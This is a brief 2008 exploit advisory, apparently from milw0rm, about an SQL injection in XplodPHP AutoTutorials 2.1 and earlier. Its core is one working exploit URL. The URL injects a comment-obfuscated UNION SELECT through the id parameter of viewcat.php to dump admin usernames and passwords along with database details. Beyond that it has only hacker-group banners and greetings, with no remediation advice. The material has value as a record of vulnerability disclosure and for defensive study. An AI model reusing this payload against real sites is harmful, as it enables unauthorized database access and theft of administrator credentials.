XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability :

Date : 2008-04-16 Author : cO2
     [  A L G E R I A     S E C U R I T Y    C R E W  ]
###################################################
[~] XplodPHP Remote SQL Injection Vulnerability
                                                                                                               
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: [email protected]
[~] Exploit :
http://www.xxx.org/viewcat.php?id=10/**/union/**/select/**/null,user(),concat(username,0x3e,password),null,null,database(),null,null,null/**/from/**/admin/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-16]

C1

 

C2

 

C3